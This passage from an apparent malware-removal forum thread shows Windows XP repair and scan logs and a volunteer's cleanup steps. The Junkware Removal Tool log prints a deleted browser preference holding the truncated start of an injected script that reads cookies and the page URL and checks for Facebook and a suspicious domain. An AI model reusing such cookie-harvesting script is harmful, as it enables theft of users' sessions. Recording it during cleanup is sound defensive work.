    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Setup>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Epoch>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess>
     
    SetACL finished successfully.
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\wscsvc.sddl'
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc\Security>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc>
     
    SetACL finished successfully.
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\wuauserv.sddl'
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv\Security>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv>
     
    SetACL finished successfully.
    21:31:32 - Services Repair Complete.
    21:31:34 - Reboot Initiated
     
    • New FSS log

    Farbar Service Scanner Version: 21-05-2014

    Ran by Gery (administrator) on 30-05-2014 at 21:37:12
    Running from "C:\Documents and Settings\Gery\Desktop"
    Microsoft Windows XP Professional Service Pack 3 (X86)
    Boot Mode: Normal
    ****************************************************************
     
    Internet Services:
    ============
     
    Connection Status:
    ==============
    Localhost is accessible.
    LAN connected.
    Google IP is accessible.
    Google.com is accessible.
    Yahoo.com is accessible.
     
     
    Windows Firewall:
    =============
     
    Firewall Disabled Policy: 
    ==================
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall"=DWORD:0
     
     
    System Restore:
    ============
    Srservice Service is not running. Checking service configuration:
    The start type of Srservice service is set to Disabled. The default start type is Auto.
    The ImagePath of Srservice service is OK.
    The ServiceDll of Srservice: "C:\WINDOWS\system32\srsvc.dll".
     
    sr Service is not running. Checking service configuration:
    The start type of sr service is set to Disabled. The default start type is Boot.
    The ImagePath of sr: "\SystemRoot\system32\DRIVERS\sr.sys".
     
     
    System Restore Disabled Policy: 
    ========================
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    "DisableSR"=DWORD:1
     
     
    Security Center:
    ============
     
     
    Windows Update:
    ============
     
    Windows Autoupdate Disabled Policy: 
    ============================
     
     
    Other Services:
    ==============
    Checking Start type of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking ImagePath of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking Start type of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ImagePath of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ServiceDll of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
     
     
     
    File Check:
    ========
    C:\WINDOWS\system32\dhcpcsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\afd.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\netbt.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\tcpip.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\ipsec.sys => MD5 is legit
    C:\WINDOWS\system32\dnsrslvr.dll => MD5 is legit
    C:\WINDOWS\system32\ipnathlp.dll => MD5 is legit
    C:\WINDOWS\system32\netman.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\srsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\sr.sys => MD5 is legit
    C:\WINDOWS\system32\wscsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wuauserv.dll => MD5 is legit
    C:\WINDOWS\system32\qmgr.dll => MD5 is legit
    C:\WINDOWS\system32\es.dll => MD5 is legit
    C:\WINDOWS\system32\cryptsvc.dll => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
     
    Extra List:
    =======
    Epfwndis(11) epfwtdi(12) Gpc(6) IPSec(4) NetBT(5) PSched(7) Tcpip(3) 
    0x0C000000040000000100000002000000030000000C0000000A00000005000000060000000700000008000000090000000B000000
    IpSec Tag value is correct.
     
    **** End of log ****
     
    • JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Thisisu
    Version: 6.1.4 (04.06.2014:1)
    OS: Microsoft Windows XP x86
    Ran by Gery on 2014-05-30 星期五 at 21:38:47.70
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
     
     
    ~~~ Services
     
     
     
    ~~~ Registry Values
     
    Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\DisplayName
    Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\URL
    Successfully repaired: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\DisplayName
    Successfully repaired: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\URL
     
     
     
    ~~~ Registry Keys
     
    Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
    Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
    Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\conduit
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\ilivid
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\softonic
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\startsearch
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
    Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\prod.cap
     
     
     
    ~~~ Files
     
     
     
    ~~~ Folders
     
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\tencent"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\babylon"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\softsafe"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\tencent"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\ytd video downloader"
    Successfully deleted: [Folder] "C:\Documents and Settings\Gery\Application Data\tencent"
    Successfully deleted: [Folder] "C:\Program Files\tencent"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\start menu\programs\ytd video downloader"
     
     
     
    ~~~ FireFox
     
    Successfully deleted: [File] C:\Documents and Settings\Gery\Application Data\mozilla\firefox\profiles\3s30ge9d.default\user.js
    Successfully deleted the following from C:\Documents and Settings\Gery\Application Data\mozilla\firefox\profiles\3s30ge9d.default\prefs.js
     
    user_pref("extensions.5157d2ca60dc9.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.co
    user_pref("extensions.delta.admin", false);
    user_pref("extensions.delta.aflt", "babsst");
    user_pref("extensions.delta.appId", "{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}");
    user_pref("extensions.delta.autoRvrt", "false");
    user_pref("extensions.delta.dfltLng", "en");
    user_pref("extensions.delta.excTlbr", false);
    user_pref("extensions.delta.ffxUnstlRst", true);
    user_pref("extensions.delta.id", "c44102c4000000000000001cc09e9dd6");
    user_pref("extensions.delta.instlDay", "15967");
    user_pref("extensions.delta.instlRef", "sst");
    user_pref("extensions.delta.newTab", false);
    user_pref("extensions.delta.prdct", "delta");
    user_pref("extensions.delta.prtnrId", "delta");
    user_pref("extensions.delta.rvrt", "false");
    user_pref("extensions.delta.smplGrp", "none");
    user_pref("extensions.delta.tlbrId", "base");
    user_pref("extensions.delta.tlbrSrchUrl", "");
    user_pref("extensions.delta.vrsn", "1.8.24.6");
    user_pref("extensions.delta.vrsnTs", "1.8.24.619:21:36");
    user_pref("extensions.delta.vrsni", "1.8.24.6");
    user_pref("extensions.delta_i.babExt", "");
    user_pref("extensions.delta_i.babTrack", "affID=124741&tsp=5010");
    user_pref("extensions.delta_i.srcExt", "ss");
     
     
     
     
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 2014-05-30 星期五 at 21:41:29.15
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     

     
    • Was SFC able to repair any errors?

    Well, basically it is repairing something but there are some or maybe almost 70% of them makes a window showing that I need to insert my Windows XP SP3 CD, but the fact is my CD is missing somewhere in my house, I tried to find it when I need to install Japanese and Chinese fonts but never find it. So I keep clicking on "cancel" choices when it shows up.


    Edited by trussardi15, 30 May 2014 - 10:19 AM.


    #11 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • OFFLINE
    •  
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 10:37 AM

    Ok, let's keep going.

     

    Can you turn on system restore? Follow the instructions here.

     

    Please download each of the files below to your desktop. Right-click on each one and select "Merge." Answer yes to any prompts.

    PolicyAgent.reg

    RemoteAccess.reg

     

    Please run FSS again after this and post the log for me.

     

    Now,

    We may be able to use SFC without your CD. Do you have a C:\I386 folder on your computer?


    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here: btn_donate_SM.png

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #12 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • OFFLINE
    •  
    • Local time:02:58 PM

    Posted 30 May 2014 - 10:44 AM

    Okay already turn system restore on.

    Merge also done.

     

    And this is the FSS log

     

    Farbar Service Scanner Version: 21-05-2014
    Ran by Gery (administrator) on 30-05-2014 at 22:28:59
    Running from "C:\Documents and Settings\Gery\Desktop"
    Microsoft Windows XP Professional Service Pack 3 (X86)
    Boot Mode: Normal
    ****************************************************************
     
    Internet Services:
    ============
     
    Connection Status:
    ==============
    Localhost is accessible.
    LAN connected.
    Attempt to access Google IP returned error. Google IP is unreachable
    Google.com is accessible.
    Yahoo.com is accessible.
     
     
    Windows Firewall:
    =============
     
    Firewall Disabled Policy: 
    ==================
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall"=DWORD:0
     
     
    System Restore:
    ============
     
    System Restore Disabled Policy: 
    ========================
     
     
    Security Center:
    ============
     
     
    Windows Update:
    ============
     
    Windows Autoupdate Disabled Policy: 
    ============================
     
     
    Other Services:
    ==============
     
     
    File Check:
    ========
    C:\WINDOWS\system32\dhcpcsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\afd.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\netbt.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\tcpip.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\ipsec.sys => MD5 is legit
    C:\WINDOWS\system32\dnsrslvr.dll => MD5 is legit
    C:\WINDOWS\system32\ipnathlp.dll => MD5 is legit
    C:\WINDOWS\system32\netman.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\srsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\sr.sys => MD5 is legit
    C:\WINDOWS\system32\wscsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wuauserv.dll => MD5 is legit
    C:\WINDOWS\system32\qmgr.dll => MD5 is legit
    C:\WINDOWS\system32\es.dll => MD5 is legit
    C:\WINDOWS\system32\cryptsvc.dll => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
     
    Extra List:
    =======
    Epfwndis(11) epfwtdi(12) Gpc(6) IPSec(4) NetBT(5) PSched(7) Tcpip(3) 
    0x0C000000040000000100000002000000030000000C0000000A00000005000000060000000700000008000000090000000B000000
    IpSec Tag value is correct.
     
    **** End of log ****
     
    Hmmmm, I look for it but I think I dont have that kind of folder in my drive C.


    #13 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • OFFLINE
    •  
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 10:52 AM

    Let's look at the SFC log.

    • Click on the Start button, then Run...
    • In the box that appears, type cmd and press Enter
     
    Next:
    • Copy and paste the following line of text into the black box:
    note: to paste, right-click in the black box and choose Paste
    findstr /c:"[SR]" %windir%\logs\cbs\cbs.log > "%userprofile%\desktop\sfcdetails.txt"
    • Press Enter to run the command, a text file sfcdetails.txt will be created on your desktop
    • Please post the contents of this log in your next reply

    Edited by Bud_91, 30 May 2014 - 10:53 AM.

    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here: btn_donate_SM.png

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #14 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • OFFLINE
    •  
    • Local time:02:58 PM

    Posted 30 May 2014 - 10:55 AM

    Ummmm, it is empty  :mellow: 


    Edited by trussardi15, 30 May 2014 - 11:02 AM.


    #15 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • OFFLINE
    •  
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 11:00 AM

    Yes CMD is the black box. I originally posted the incorrect instructions, but they are right now.


    Edited by Bud_91, 30 May 2014 - 12:09 PM.
    typo

    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here: btn_donate_SM.png

     

    A.K.A. Buddierdl @ GeeksToGo.com





    0 user(s) are reading this topic

    0 members, 0 guests, 0 anonymous users